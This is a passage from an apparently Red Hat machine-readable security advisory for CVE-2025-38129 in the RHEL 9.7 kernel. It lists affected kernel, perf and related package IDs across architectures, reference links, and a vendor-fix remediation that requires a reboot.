"NFV-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.src",
"RT-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch",
"RT-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-doc-0:5.14.0-611.35.1.el9_7.noarch",
"RT-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-38129"
},
{
"category": "external",
"summary": "RHBZ#2376034",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376034"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-38129",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38129"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-38129",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38129"
},
{
"category": "external",
"summary": "https://lore.kernel.org/linux-cve-announce/2025070330-CVE-2025-38129-3c0e@gregkh/T",
"url": "https://lore.kernel.org/linux-cve-announce/2025070330-CVE-2025-38129-3c0e@gregkh/T"
}
],
"release_date": "2025-07-03T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-02-23T10:50:56+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.src",
"AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.s390x",
